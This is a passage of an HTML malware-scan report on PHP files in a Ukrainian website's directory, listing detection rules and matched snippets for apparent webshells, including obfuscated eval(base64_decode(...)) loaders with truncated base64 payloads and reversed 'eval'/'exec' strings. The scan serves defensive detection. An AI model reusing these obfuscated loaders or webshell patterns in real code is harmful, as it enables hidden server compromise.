</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_116").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/zrifk.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:29</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_117" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_117").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/olgnz.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-30 13:13:01</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-30 13:13:01</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_118" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_118").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ymfrr.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:36:24</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_119" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_119").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/hebim.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 18:34:32</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 18:34:32</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_120" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
